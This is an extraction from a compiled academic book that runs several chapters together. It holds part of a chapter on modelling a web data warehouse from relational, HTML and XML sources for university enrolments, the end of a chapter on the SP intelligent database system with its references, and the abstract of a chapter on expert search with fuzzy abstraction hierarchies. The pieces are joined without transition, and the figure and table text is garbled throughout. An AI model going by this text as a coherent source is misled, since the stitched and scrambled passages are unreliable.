“part-of” where a lower hierarchy is part of the upper one, or part can be an existencedependent or existence-independent. When the part is considered as existence dependent, it means that the part cannot be shared with other classes or removed from the whole. Whereas, Existence independent is where the part can be shared with other classes and can be removed independently of the whole. An inheritance (Rahayu, 1999; Rahayu, Chang, Dillon, & Taniar, 2000) type is where the problem is modeled as a super class with sub-classes. The sub-class utilizes the information in the super-class and its own information to specialize itself. An association relationship represents a connection between two objects. There are three types of association relationships such as one to one, one to many, and many to many. The type being used depends on the criteria of the problem. •
Semantic Network Diagram: If given an XML document as one of the data sources, we employ the semantic network diagram (Feng, Chang, & Dillon, 2002) to translate XML data into the proposed integrated model. The semantic network diagram is divided into the semantic level and schema level. The former developed a specific diagram from the XML document structure and the latter maps from this specific diagram into the target model, an integrated data model. The semantic network diagram is divided into four major components: nodes, directed edges, labels, and constraints. Suppose a semantic network diagram in Figure 1 is studied.
Based on the construction rules to formalize a semantic network diagram (Feng et al., 2002; Pardede, Rahayu, & Taniar, 2004), there are five nodes: A, B, X, Y, Z in the diagram. The first two nodes are the complex nodes while the rest are
Web Data Warehousing Convergence
the basic nodes. There are four directed edges representing the semantic relationships between the objects. In our work, we use different labels to indicate the relationship corresponding to each edge. Different labels are interpreted as follows: •
p indicates “in-property”; g indicates generalization; a indicates aggregation; c indicates composition.
Various types of constraints such as uniqueness, cardinality, ordering, etc., can also be added to the nodes or edges. The modeling representation in Figure 2 presents a well-defined conceptual design from XML data. The attributes or elements declarations and simple or complex type (Pardede, Rahayu, & Taniar, 2005) definitions in XML schema are mapped into the four components or directed edges.
INTEGRATION PROPOSED TECHNIQUE The structures of underlying data sources can be the combination of relational structures and structures that are available in XML documents and object databases. •
we adopt the mapping tool and technique that is proposed in the works of Bishay, Taniar, Jiang, and Rahayu (2000), and Li, Liu, Wang and Peng (2004) to map from HMTL data to XML data so that attributes can be identified. Figure 4 shows HTML data that are translated to XML schema using very basic and straight forward mapping steps. More information on the mapping and transforming techniques can be found in these two references.
Translation Technique of HTML Data into XML Structure: Before conducting the integration of a Web data warehouse model,
1.
2.
Mapping Rule: Referring to Figure 3, let the content of table XYZ is a set of rows
and each row contains a set of column
; XYZ is mapped to an XML schema structure;
is mapped to the ;
is mapped to the wihin the sequence. Motivation by a Case Study: To provide a feasible example for this article, we illustrate the proposed approaches based on the need to build a data warehouse system for university enrolments. Information about the enrolments is stored in relational and Web forms. This is due to the fact that each individual faculty uses its own system and none is currently linked.
One faculty might have its own Web-based system while the others, for various reasons, might have just a normal database system to handle the enrolment of students. It is the goal
Figure 2. Semantic network diagram
p
A
a[0..n]
B
a
Z
X a
Y
683
Web Data Warehousing Convergence
of the university to construct a data warehouse system in order to analyze student enrolments in areas/subjects/degrees, and also the trend of enrolments in different years including semesters. The university is also interested in the analysis of degree enrolments for a particular area; for example, for the Masters degree, there might be more students enrolled in course work than in research. In some rare cases, a university may be limited in its ability to provide both research and coursework. Thus, it is interesting to see the relationship between these parties. A faculty may be formed by one or more schools, and a certain number of degrees belong to a particular school. A study of an advanced subject is required for some prerequisites. The university would like information about the prerequisites to be kept in the warehouse system for future analysis. Points to consider are that a specific degree belongs to only one faculty. A subject can be attended by students across the degrees. The methodology for specifying the conceptual integrated data warehouse model in two phases is as follows: phase (a) consists of the steps, which are temporarily referred to as conceptual defined sequence, to assist with the process of creating the conceptual integrated dimensions and fact; phase (b) is an extension of phase (a) to allow data structures of relational and HTML/XML
data sources to be fully unified and incorporated in the integrated data warehouse model.
Conceptual Web Integrated Dimensions and Fact Conceptually, starting with the assumptions of the user specified requirements and information related to underlying sources in relational and XML, we form a set of steps for defining our integrated Web data warehouse model. Please note that by this time, HTML data have been translated to XML structure. The methodology consists of the following steps, which we temporarily refer to as a conceptual defined sequence, to assist with the process of creating the model: 1. Simplifying the requirements: Structures of underlying data sources can also be simplified if possible. 2. Defining integrated dimensions involves two sub-steps: (a) Specifying n classes where n ≥ 1; (b) classifying hierarchy: additional specified information by any other means is a great advantage. Suppose two classes A and B in a dimension, the relationship between A and B can either be a, b, or c. a. Aggregation: Deals with the dependence between the classes. Considering the car-
Figure 3. Translating HTML data to XML structure
r1a1
r1a2
r1c2
r2cc3
r2c1
r1c2
r2cc3
684
< xsd:sequence> r1c2
Web Data Warehousing Convergence
dinality where needed, -to-one or to-many, between the base classes and sub-classes. b. Inheritance: Categories subtypes and super-types. c. Collection: Handles multi values in an attribute. This relationship in our approach is not for hierarchy building, but rather for storing data in a more efficient manner. d. Association: Is when two classes have an association relationship, using a -to-one; to-many to describe the association between classes 3. Defining Fact: A simple, single fact, which is surrounded by integrated dimensions. Hierarchy and cardinality should be identified.
is a generalization and research or coursework is specialization. No cardinality. A conceptual degree dimension is derived based on steps 1 and 2 shown in Figure 4. •
The conceptual defined sequence is now used to specify the conceptual integrated Web dimensions and fact as follows: •
Inheritance Type Dimension: Dimensional analysis is such “…The university is also interested in the analysis of degree enrolments for particular type, for example, for a Masters degree, there may be more students enrolled in course work than in research but it may be that a university has a strong constraint in providing both research and coursework…,” applying the conceptual defined sequence, a conceptual degree is specified as follows: 1. Simplifying requirements. A Degree can be further classified as a Research Degree or a Coursework Degree. 2. Identified Dimension {Degree}
Classes {Degree, Research, Coursework} Hierarchy {Generalization} additional formation: the same number of years applies to all Masters degrees. Extra information is needed to support the specialization of a degree type. An inheritance type is an ideal modeling feature because a degree
Collection Type Dimension: Dimensional analysis may be: “…A study of an advanced subject is required for some prerequisites. The university would like information about the prerequisites to be kept in the warehouse system for future analysis…,” applying the conceptual defined sequence; a conceptual degree is specified as follows. 1. Simplifying requirements. A subject needs to store its prerequisites. Each subject has two prerequisites at most. 2. Identified Dimension {Subject} Classes {Subject} Hierarchy{NIL} A collection type is an ideal modeling feature because it allows a prerequisite to be modeled as an attribute that stores multi-values using array, row, set. No cardinality.
A conceptual subject dimension is derived based on step 1 & 2 shown in Figure 5. •
Aggregation Type Dimension: As recalled earlier, we claim that aggregation is further grouped into two groups: Non-shareable-existence dependent and shareable-existence dependent.
Figure. 4. A conceptual degree dimension DegreeDim ension
Research
CourseWork
685
Web Data Warehousing Convergence
•
Non-shareable Existence Independent Type Dimension: Dimensional analysis is such “…A faculty may be formed by one or more schools and a certain number of degrees belongs to a particular school…,” applying the conceptual defined sequence, a conceptual faculty is specified as follows: 1. Simplifying requirements. A Faculty can own none or more than one school. 2. Identified Dimension {Faculty} Classes {Faculty, School}
Hierarchy {Aggregation} additional formation: a Faculty can be existed without a School. One-to-many. A conceptual faculty dimension is derived based on information above, shown in Figure 6. •
Figure 5. A conceptual subject dimension SubjectDim ension
Figure 6. A conceptual faculty dimension FacultyDimension
Shareable Existence Independent Type Dimension: Dimensional analysis is such “…also the trend of enrolments in different years including semesters …,” applying the conceptual defined sequence, a conceptual time is specified in Figure 7. 1. Simplifying requirements. A time can also include semester. Semester is needed for enrollment. 2. Identified Dimension {Time} Classes {Time, Semester} Hierarchy {Aggregation} additional information: A semester can be shared with other classes. Time has many months or years. And a year has more one or more semesters.
1
Thus, it is a many-to-many as shown in Figure 7.
*
•
SchoolComponent
Figure 7. A conceptual time dimension Tim eDim ension
* *
Fact Class: Fact analysis is such “…compute student enrolment to timely analyze the trends and performance of subjects and degrees in faculties….” From item 3 in section A, we have Class{Uni_Fact}; Hierarchy {Association}; one-to-many.
A conceptual fact class is derived in Figure 8 surrounding the support of the conceptual integrated dimensions:
Logical Web Integrated Dimensions and Fact
SemesterComponent
In this section, the rest of the integrated dimensions and facts are specified in greater detail to directly utilize the structures of underlying sources. It
686
Web Data Warehousing Convergence
Figure 8. Conceptual fact surrounded by integrated dimensions SubjectDim ension
1 *
DegreeDimension
1
Uni_Fact
1
Tim eDimension
* *
Research
* *
*
CourseWork
SemesterComponent
1 FacultyDimension
1 * SchoolComponent
assumes that both relational data sources and HTML/XML documents are retrieved based on the user requirements and available structures in the sources. •
Adding Attributes to Collection type Dimension: A Semantic network diagram has not yet formalized a representation for a collection type. Thus, we propose a “C” label indicating a collection type that represents a semantic in the data complex type.
With reference to Figure 9, shows relational data & semantic network diagram Attrs{A, B, M1, M2..Mn} are simple data types; Attrs{M1, M2} are multi-valued attributes in relational table; And Attrs{M1, M2} sub-elements in Semantic Network Diagram; ComplexType (Type 1, Type 2}. Adding attributes to a collection type dimension consists of two steps: •
Step 1: For a relational data source table that has attributes {A, B, M1, M2}, which
•
are required for analytical information. Attribute {A, B} are added to Dimension 1. Attributes { M1, M2} are stored as a {C} attribute that has a VARRAY type. Attribute {C} is an array type that take two elements, which is also added to Dimension 1. Step 2: For two complex types namely Type 1 and Type 2 with elements {A, B} and {M1, M2} respectively, Type 2 is an inner complexType element in Type 1. Type 2 element contains sub-elements {M1, M2}. Thus, element {A, B} in Type 1 are mapped to attributes {A, B} in Dimension 1; subelement{M1, M2} are mapped to an element {C} in Dimension 1. Note element{C} is defined as a VARRAY type in step 1.
Example: Conceptual subject dimension in Figure 5 is now presented here to add appropriate attributes and data structures in order to complete the integration of a logical integrated subject dimension shown (Figure 10).
687
Web Data Warehousing Convergence
Figure 9. Specifying data sources in dimension using collection type Relational Data Relational Data Attr. A
Attr. B
Attr. M1
Attr. M2
Attr. D..
Val1
Val 2
val3
val4
val5
...
...
...
...
...
XML Data C
El. A El. B
Type 1 S[1..N]
El. M1 E2.M2
C
Type 2
Dimension 1 A B C
Figure 10. Adding/mapping attribute data to the conceptual integrated subject dimenSubject Infro. Of Comp. Sci. Fac. Relational Subject Data SubjectID
Step 1: For subject relational data table provided by health and science faculty with a set of attributes {Subjectid, Subjectname, Req1, Req2}, which are required for analytical information. Attributes {SubjectID, Sub-
688
jectname} are added to the conceptual subject dimension. Attributes {Req1, Req2} are stored in a VARRAY element {Prerequisites}, which can take two elements in a single record. Attribute {Prerequisite} is
Web Data Warehousing Convergence
then also added to subject dimension. Refer to SubjectDimension in Figure 10. Step 2: For an outer complex type, SubjectType and elements {Subjectid, Subjectname, Refsubject}. {Refsubjectprereq} is an inner complexType element of SubjectType. Refsubject complexType contains sub-elements {Req1,Req2}. Thus, elements {Subjectid, Subjectname} in SubjectType are mapped to attributes {Subjectid, Subjectname} in SubjectDimesnion, which are added in step 1. Elements { Req1, Req2} are mapped to element{Reprequisite}. And element {Reprequisite} can contain up to two subelements as formed in step 1. A complete subject integration forms classes and attributes as follows: SubjectDimension {SubjectID, Subjectname, prerequisite}
add specialized attributes {E}, {F} or {E, F} to each sub-dimension. Step 2: For three complex types, namely Type 1, Type 2 and Type n with elements {A, B, D, E, F} are required analytical information. Type 1 is the base type where Type 2 and Type n are of the extension based Type 1. Element {A, B} in Type 1 are mapped to attributes {A, B} in Dimension 2. Extension base types Type 1 is mapped to sub-type of Value31; whereas Type n is mapped to Value32 respectively. An element such as {E} or {F} is mapped to its own class where appropriate. Example: Conceptual degree dimension, in phase (i) Figure 4 earlier, is now presented in
Figure 11. Specifying data sources in dimension using inheritance type
where SubjectID is primary key (OID) Relational Data •
Adding Attributes to Inheritance Dimension: Figure 11 shows that relational data and semantic network diagram Attrs{A, B, D, E, F} are simple data types; Attrs{D} is a type attribute; generalized attributes{A,B} specialized Attrs{E, F}; ComplexType (Type 1, Type 2, Type 3…Type n}. Adding attributes to an inheritance dimension consists of two steps:
Step 1: For a relational data source table that has attributes {A, B, D, E, F, E}, which are required for analytical information. Dimension 2 is a super-type, which has one or more sub-dimensions. Each sub-dimension has one or more specialized attributes. To complete an integration of inheritance dimension: add generalized attributes{A,B} to super-type Dimension 2; map a value group of type attribute {D} to a sub-dimension.;
Relational Data Attr. A
Attr. B
Attr. D
Attr. E
Val11
Val 21
val31
-----
Attr.F
Attr. C
Val12
Val22
Val32
Val42
----
Val62
Val13
Val23
Val31
----
Val53
Val63
val51 Value61
XML Data g
Type 1 g
g
Type 2
Type 3
g El. E
Dimension 2 A B
Value32 F
Value31 E
689
Web Data Warehousing Convergence
Figure 12 to add appropriate attributes and data structures in order to complete the integration of degree dimension.
coursework. Each sub-dimension has one or more specialized attributes such as {Area} or {Major}. To complete an integration of the inheritance DegreeDimension: add generalized attributes{Degreeid,Degreename} to DegreeDimension; mapping Research value of DegreeType to Research sub-type and Coursework value of DegreeType to Coursework sub-type; Area is an attribute to specialise the research degree and major
Step 1: For a relational degree source table that has attributes {DegreeID, Degreename, Degreetype, Area, Major}, which are required for analytical information. DegreeDimension is a super-type which can have two sub-dimensions, research, and
Figure 12. Adding/mapping attribute data to the conceptual integrated degree dimension Degree Infro. Of Comp. Sci. Fac. Relational Degree Data DegreeID
DegreeName
DegreeType
Area
Major
FacultyID
MSCS
M. Comp. C.
Research
----
I.T
CSE
MSCC
M.Comp. R.
Coursew ork
Netw ork
----
CSE
MSES
M. Eng. C.
Research
----
SWE
CSE
DegreeDim ension DegreeID Degreename
Research Area
CourseWork Major
Degree Infro. Of Health Sci. Fac.
.
690
Web Data Warehousing Convergence
is the attribute to specialize coursework degree. Thus, attribute {Area} is added to Research sub-type and {major} is added to Coursework sub-type. Step 2: For three complex types, DegreeType, ResearchType and CourseworkType with elements {DegreeID, Degreename, Area, Major}. DegreeType is the base type where ResearchType and CourseType are of the extension base DegreeType. Element {DegreeID, Degreename} in DegreeType are mapped to attributes {DegreeID, Degreename} in DegreeDimension. ComplexType of Research of extension base DegreeType is mapped to sub-type of Research; whereas ComplexType Coursework is mapped to subtype Coursework. Element such as {Area} and {Major} is mapped to its own Research and Coursework respectively. A complete degree integration forms classes and attributes as follows:
DegreeDimension {DegreeID, Degreename, reprequisite} Research{Area} Coursework{Major} where DegreeID is primary key (OID) •
Adding Attributes to Aggregation Dimension: Non-shareable Existence Dependent type is applied to a problem where “parts” are dependent on the “whole.” When the whole is removed, its parts are also removed. With reference to Figure 13, Attrs{A, B, C, D, E, F} are simple data types; ComplexType (Type 1, Type 2}. Adding attributes to aggregation dimension consists of two steps:
Step 1: For a relational data table 1 and relational data table 2 that have attributes {A, B, D, E}, which are required for analytical information. Relational data table 1 has a one-to-many relationship with relational data table 2. And relational data table 2 is composed of relational data table 1. Thus,
Figure 13. Specifying data sources in dimension using non shareable existence dependent Relational Data
Relational Data Table 1 Attr. A
Attr. B
Attr. C
Val1
Val 2
val3
...
...
...
Relational Data Table 2 Attr. D
Attr. E
Attr. A
Val4
Val 5
val6
...
...
...
Dimension 3 A B 1 *
Component
XML Data El. A El. B
a
Type 1
E
a
F
Type 2
El. E El. F
691
Web Data Warehousing Convergence
relational data table 1 is a parent of relational data table 2. Step 2: For two complex types namely Type 1 and Type 2 with elements {A, B} and {E,F}. If Type 2 is composed by Type 1 then Type 1 is mapped to Dimension 3 and element {A, B} in Type 1 are added to attributes {A, B} in Dimension 3. Type 2 is also mapped to component of Dimension 3 and elements {E, D} are added to Component of Dimension 3. Note that element names in Type 2 are not matched with element names in Component. For the time being, presumably element {E} is matched with element {E} and element {D} is matched with element {F}.
Example: Conceptual faculty dimension, section (A) Figure 6 earlier, is now presented in Figure 14 to add appropriate attributes and data structures in order to complete the integration of the degree dimension. Step 1: For the relational faculty data source table and relational school data tables that have attributes {FacultyID, Facultyname} and {SchoolID, Schoolname}, which are required for analytical information. Relational Faculty has a one-to-many relationship to the Relational School Table. And the Relational School Table comprises the Faculty Table. Thus, the Faculty Table is a parent
Figure 14. Adding/mapping attribute data conceptual faculty dimension Faculty Infro. Of Comp. Sci. Fac. Faculty Table FacultyID
FacultyName
SchoolID
CSE
Comp. Sci.
CSM
BLF
Bus.Law
ABC
FacultyDimension FacultyID Facultyname
1 School Table
*
SchoolID
Schoolname
FacultyID
CSM
Comp. & Math
CSE
ABC
Acct. & Bus.
BLF
SchoolComponent SchoolID Schoolname
Faculty Infro. Of Health & Sci. Fac. .
692
Web Data Warehousing Convergence
of the School Table. On the other hand, FacultyDimension and SchoolComponent have a Part-Of relationship. On the other hand, the FacultyDimension is a parent of SchoolComponents. The SchoolComponent is a non-shareable part which means that when FacultyDimension is removed, SchoolComponents is also removed. To complete an integration of FacultyDimension: add attributes{FacultyID, Facultyname} in Faculty Relational table to FacultyDimension; add attributes {SchoolID, Schoolname) in Relational School table to the corresponding SchoolComponent. Step 2: For two complex types, namely Faculty type and School type with elements {FacultyID, Facultyname} and {SchoolID,Schoolname}. If the School type comprises the Faculty type, then Faculty type is mapped to FacultyDimension. The elements {FacultyID, Facultyname} in Faculty type are added to attributes {FacultyID,Facultyname} in FacultyDimension. School type is also mapped to SchoolComponent and elements
{SchoolID, Schooname} in School type are added to SchoolComponent. A complete faculty integration forms classes and attributes as follows: FacultyDimension {FacultyID, Facultyname} SchoolComponent{SchoolID, Schoolname} where Faculty, SchoolID are primary keys (OIDs) Shareable Existence Independent Type is applied where parts are independent of the whole. When the “whole” is removed, parts still remain. The time conceptual dimension in Figure 7 now shows the process of specifying/mapping attributes in Figure 15. A complete time integration forms classes and attributes are formed. TimeDimension {TimeID,Description} Semester {SemesterID,Description}
Figure 15. Adding/mapping attribute data conceptual time dimension Time Infro. Of Comp. Sci. Fac. Relational Enrolment Data SubjectID
DegreeID
StudentID
Date
CSE21AI
MCSM
14312345
12/02/199 9
...
...
...
... ...
TimeDimension TimeID
Time Infro. Of Health & Sci. Fac. 1
And this multiple alignment is processed to make a copy of each coherent sequence of matched symbols in row 0 and each coherent sequence of unmatched symbols in row 0 and in row 1. Each such copy is given one or two identification symbols and brackets at each end. In addition, the program creates an “abstract” pattern as described as follows. The result of this processing is a set of patterns like these: < < < < <
%2 %3 %4 %4 %5
t r 0 1 <
h e > a b b i t > j a c k > w h i t e > %2 > < %4 > < %3 > >
and these patterns are added to the repository of Old patterns. Notice how, in this example, the first four patterns that are isolated are words (in English) and how the fifth pattern records the sequence of matched and unmatched patterns by means of their identification symbols, “%2”, “%4” and “%3”. Notice also how “< %4 0 j a c k >” and “< %4 1 w h i t e >” both contain the identification symbol “%4” which means that they are alternatives within the larger context represented by the fifth pattern. The identification symbols “0” and “1” in those two patterns provide the means of distinguishing between them. This simple example gives the flavour of how, in the tradition of structuralist linguistics (see, for example, Harris, 1951; Fries, 1952), the SP70 model is able to isolate significant structures such as words in natural language and distributionally-equivalent classes of words such as the nascent category of “adjective” represented by the symbol “%4”.
749
Aspects of Intelligence in an “SP” Database System
But Phase 1 of processing by SP70 is not sufficient in itself to isolate things like words and word classes in a tidy manner. A large proportion of the patterns that are generated by the system in this phase of processing are very clearly “wrong”. There is a large amount of rubbish mixed up with the patterns that we would naturally regard as the “correct” way to describe the raw data. It is Phase 2 of SP70 that sorts the wheat from the chaff, extracting those patterns that are useful for the economical encoding of the original New patterns and discarding the rest. The process is a fairly straightforward application of the principle of “hill climbing”, building a set of one or more alternative grammars in stages and using the principles of minimum length encoding to evaluate alternative grammars at each stage so that “good” ones are retained and “bad” ones are discarded. Given a set of simple sentences, SP70 is able to create alternative grammars for the sentences and the best of these grammars (in terms of minimum length encoding) are also grammars that appear subjectively to be “plausible” or “correct”, both in terms of the words that are isolated and in terms of the classes of distributionally-equivalent words that are identified. These results are an encouraging sign that the concepts are developing along the right lines but the program is less successful with examples that are more complex. In particular, while the program is able to isolate low-level structures like words and abstract patterns that describe the overall structure of a sentence, it is not able to isolate intermediate levels of structure such as phrases or clauses. More work will be needed to overcome this problem and other weaknesses in the model as it stands now.
Minimum Length Encoding With regard to principles of minimum length encoding, the program demonstrates clearly how, in Phase 2, it achieves levels of compression that
750
increase progressively as it searches for grammars that provide the best overall description of the New patterns. This can be seen in Figure 17 which shows measurements made by SP70 when it successfully discovered a plausible grammar for eight simple sentences that were presented to the program as eight New patterns. The X axis shows the succession of New patterns that are processed in Phase 2, and the Y scale on the left shows cumulative sizes (in 10,000 of bits) of the New patterns in their raw state (“O”), the size of the best grammar found at each stage (“G”), the size of the raw data after it has been encoded in terms of the best grammar (“E”), and the sum of G and E at each stage, represented as “T”. The plot marked T/O is a measure of the compression achieved at each stage (on the right Y scale), showing how, in accordance with principles of minimum length encoding, (G + E) decreases progressively relative to the size of the raw data.
Learning in an SP Intelligent Database Ordinary database management systems do not learn as that term is normally understood. They are simply supplied with knowledge by manual input or, sometimes, by the automatic collection of data from some source. Although acquisition of knowledge is one of the elements of learning, and adding knowledge to a database may be seen as a primitive form of learning, something more is expected from an intelligent database if it is to learn in the “intelligent” manner that we associate with human learning. The key ingredient that is missing from ordinary databases is the ability to organise knowledge in ways that are “meaningful” or “useful”. It should, for example, be possible to supply the database with the kind of data that might be gathered by a botanist or zoologist on some field trip or expedition and then the database would organise that knowledge automatically into a taxonomy of classes and subclasses, with associ-
Aspects of Intelligence in an “SP” Database System
Figure 17. Measurements made by SP70 (described in the text) as the program derives a plausible grammar from eight sentences presented to the program as eight New patterns. e patterns.
* This figure is reproduced from Wolff (2006, p. 286), with permission
ated hierarchies of parts and subparts. It should be possible to analyze the kind of raw data that a company might have stored about its customers and derive rules that may be useful in marketing, such as associations between particular post codes and high-spending customers. Of course, taxonomies can be derived by the many versions of cluster analysis, and the derivation of rules from raw data has been the subject of intensive investigation in the field of “data mining”. But, as indicated, the SP program of research differs from research that is dedicated purely to one facet of intelligence because it aims to develop a framework that integrates learning with several other aspects of intelligence. We have seen how the unsupervised learning of a grammar for a sample of natural language may be achieved within the SP framework but this is not exactly the same as learning class hierarchies, part-whole hierarchies or rules in an intelligent database. However, there are close parallels amongst these forms of learning:
•
•
•
Part of the process of developing a class hierarchy or a set of rules is the process of identifying the elements of those structures. This similar to the way in which a grammar-induction program must abstract words, phrases and other elements of grammatical structure. Likewise, there is a need in all these kinds of learning to identify hierarchies of parts and sub-parts. And the learning of a hierarchy of classes and sub-classes is very similar to the learning of grammatical rules at varying levels of abstraction from kinds of “sentence” at the highest level to words, morphemes, phonemes, or allophones at the lower levels of grammatical structure.
In the development of the SP70 model, it is anticipated that if or when the system can be developed to a stage where it has a robust capability for the unsupervised learning of realistic
751
Aspects of Intelligence in an “SP” Database System
grammars, it may then be applied with little or no modification to the learning of class hierarchies, part-whole hierarchies, and associations and rules of the kind used in expert systems. With these kinds of capabilities, a mature version of the SP system should be able to automate such processes such as organising raw data into meaningful structures, reorganizing badlystructured data into well-structured knowledge and discovering associations and rules that may later be applied in probabilistic reasoning about the stored knowledge. Since class-hierarchies and part-whole hierarchies are center-stage in object-oriented software design, object-oriented databases, and in the entity-relationship approach to software engineering, it is anticipated that the mature SP system will provide for the automation or semiautomation of these kinds of application.
CONCLUSION The SP system is still being developed and there are still issues to be resolved. However, current models demonstrate clearly that there is a good prospect of achieving the overall goal of this research program — to develop a single, relatively simple framework for a range of different aspects of intelligence. In this chapter, we have reviewed with examples, some aspects of intelligence that may be provided by an intelligent database founded on the SP concepts. We have seen how the system supports the kind of “fuzzy” pattern recognition that is so prominent in human perception (including pattern recognition through multiple levels of abstraction and the ability to recognize things despite errors of omission, commission, and substitution), how it supports best-match retrieval of information and “semantic” forms of information retrieval, how the system may perform various kinds of reasoning, both classical and probabilistic (including probabilistic deduction, abduc-
752
tion, and nonmonotonic reasoning), how the SP system can support the analysis and production of natural language (so that it may facilitate the provision of a natural language front end to an intelligent database) and how, with some further development, the system is likely to support the kind of unsupervised learning that one might hope to see in any database system that aspires to be intelligent. What has been described in this chapter is an introduction to the SP system and what it can do. A wider coverage, with more detail, may be found in Wolff (2006). I hope that readers will explore the concepts in more depth and contribute their own research and thinking to the further development of these ideas.
REFERENCES Bertino, E., Catania, B., & Zarri, G. P. (2001). Intelligent database systems. Harlow: AddisonWesley. Brent, M. R. (1999). An efficient, probabilistically sound algorithm for segmentation and word discovery. Machine Learning, 34, 1-3. Cover, T. M., & Thomas, J. A. (1991). Elements of information theory. New York: John Wiley. Bray, T., Paoli, J., Sperberg-McQueen, C. M., Maler, E., & Yergeau, F. (2004). Extensible Markup Language ({XML}) 1.0 (3rd ed.). World Wide Web Consortium. Retrieved from http://www. w3.org/TR/2004/REC-xml-20040204/ Fries, C. C. (1952). The structure of English. New York: Harcourt, Brace & World. Gazdar, G., & Mellish, C. (1989). Natural language processing in Prolog. Wokingham: Addison-Wesley. Gold, M. (1967). Language identification in the limit. Information & Control, 10, 447-474.
Aspects of Intelligence in an “SP” Database System
Harris, Z. S. (1951). Methods in structural linguistics. Chicago: University of Chicago Press. Li, M. & Vitányi, P. (1997). An introduction to Kolmogorov complexity and its applications. New York: Springer-Verlag. Nevill-Manning, C. G., & Witten, I. H. (1997). Compression and explanation using hierarchical grammars. Computer Journal, 40 (2/3), 103116. Pereira, F. C. N., & Warren, D. H. D. (1980). Definite clause grammars for language analysis — A survey of the formalism and a comparison with augmented transition networks. Artificial Intelligence, 13, 231-278. Solomonoff, R. J. (1964). A formal theory of inductive inference. Parts I and II. Information and Control, 7, 1-22; 224-254. Solomonoff, R. J. (1997). The discovery of algorithmic probability. Journal of Computer and System Sciences, 55(1), 73-88. Storer, J. A. (1988). Data compression: Methods and theory. Rockville, MD: Computer Science Press. Wolff, J. G. (1977). The discovery of segments in natural language. British Journal of Psychology, 68, 97-106. Retrieved from www.cognitionresearch.org.uk/lang_learn.html#wolff_1977 Wolff, J. G. (1980). Language acquisition and the discovery of phrase structure. Language & Speech, 23, 255-269. Retrieved from www.cognitionresearch.org.uk/lang_learn.html#wolff_1980 Wolff, J. G. (1988). Learning syntax and meanings through optimization and distributional analysis. In Y. Levy, I. M. Schlesinger, & M. D. S. Braine (Eds.), Categories and processes in language acquisition, (pp. 179-215). Hillsdale, NJ: Lawrence Erlbaum. Retrieved from www.cognitionresearch. org.uk/lang_learn.html#wolff_1988
Wolff, J. G. (1999). Probabilistic reasoning as information compression by multiple alignment, unification and search: An introduction and overview. Journal of Universal Computer Science, 5(7), 418-462. Retrieved from http://arxiv. org/abs/cs.AI/0307010 Wolff, J. G. (2000). Syntax, parsing and production of natural language in a framework of information compression by multiple alignment, unification and search. Journal of Universal Computer Science, 6(8), 781-829. Retrieved from http://arxiv. org/abs/cs.AI/0307014 Wolff, J. G. (2003a). Information compression by multiple alignment, unification and search as a unifying principle in computing and cognition. Artificial Intelligence Review, 19(3), 193-230. Retrieved from http://arxiv.org/abs/cs.AI/0307025 Wolff, J. G. (2003b). Unsupervised grammar induction in a framework of information compression by multiple alignment, unification and search. In C. de la Higuera, P. Adriaans, M. van Zaanen, & J. Oncina (Eds.), Proceedings of the Workshop and Tutorial on Learning ContextFree Grammars (pp. 113-124). Retrieved from http://arxiv.org/abs/cs.AI/0311045 Wolff, J. G. (2006). Unifying computing and compression: The SP theory and its applications (Ebook ed.). Menai Bridge: CognitionResearch. org.uk. Retrieved from http://www.cognitionresearch.org.uk/sp.htm#BOOK Wolff, J. G. (forthcoming a). Medical diagnosis as pattern recognition in a framework of information compression by multiple alignment, unification and search. To appear in Decision Support Systems. Available online from May 17, 2005. Retrieved from http://www.cognitionresearch. org.uk/papers/applications/medical/medical_applications.htm Wolff, J. G. (forthcoming b). Towards an intelligent database system founded on the SP theory
753
Aspects of Intelligence in an “SP” Database System
of computing and cognition. To appear in Data & Knowledge Engineering. Retrieved from http:// www.cognitionresearch.org.uk/papers/dbir/dbir. htm
2
ENDNOTES 1
The phrase minimum length encoding is an umbrella term for the closely-related concepts of “minimum message length” encoding and “minimum description length” encoding. These terms relate to the process of creating or discovering a grammar or other form of knowledge that will describe a given body of raw data. Solomonoff (1964, 1997) realized that there is an infinite range of alternative grammars that may describe any given body of raw data. He proposed that, to discriminate amongst these alternatives, one should try to minimise (G + E), where G is the size of the grammar (in bits of information) and E is the size of the body of raw data (in bits) when it has been encoded in terms of the grammar. Minimising (G + E) is equivalent to compressing the raw data as much as possible, where the compressed representation includes both the code system that is used and the encoding of the raw
3
4
5
data. These principles may be applied to any kind of knowledge, not just “grammars” in a narrow sense of that term. It is clear that, when diagnosis is done by a doctor, vet, or plant specialist, causal reasoning also has an important role. Nevertheless, much can be achieved by viewing the diagnostic process purely as a form of pattern recognition. In the absence of any number at the end of each pattern representing the relative frequency of the pattern, SP62 assumes a default value of 1. The main difference between SP62 and SP61 is that the former allows the use of one, two, or more new patterns (treated as an unordered set as described in the text) whereas the latter allows the use of only one new pattern. Compared with multiple alignments shown earlier, this one has been rotated by 90˚, simply because it takes up less space on the page. When multiple alignments are shown in this way, the new pattern (or patterns) are always in row 0 and the old patterns appear in the other rows, one pattern per row. The order of the old patterns across the rows is entirely arbitrary, without special significance.
This work was previously published in Intelligent Databases: Technologies and Applications, edited by Z. Ma, pp. 197-237, copyright 2007 by Idea Group Publishing (an imprint of IGI Global).
754
755
Chapter 2.18
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems Kun-Woo Yang Keimyung University, South Korea Soon-Young Huh KAIST Business School, South Korea
ABSTRACT In knowledge management systems (KMS), managing explicit knowledge is comparatively easy using information technology such as databases. However, tacit knowledge, usually possessed by human experts in unstructured forms such as know-how and experiences, is hard to systemize. Recent research has shown that it is more effective to provide search mechanisms for experts than to directly search for specific knowledge itself in KMS to pinpoint experts with needed knowledge in the organizations so that users can acquire the knowledge from the found experts. In this article, we propose an intelligent search framework to provide search capabilities for experts who not only match search conditions exactly but also
belong to the similar or related subject fields according to the user’s needs. In enabling intelligent searches for experts, the Fuzzy Abstraction Hierarchy (FAH) framework has been adopted. Based on FAH, searching for experts with similar or related expertise is facilitated using the subject field hierarchy defined in the system. While adopting FAH, a text categorization approach based on Vector Space Model is also utilized to overcome the limitation of the original FAH framework. To test applicability and practicality of the proposed framework, the prototype system, “Knowledge Portal for Researchers in Science and Technology” sponsored by the Ministry of Science and Technology (MOST) of Korea, has been developed.
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
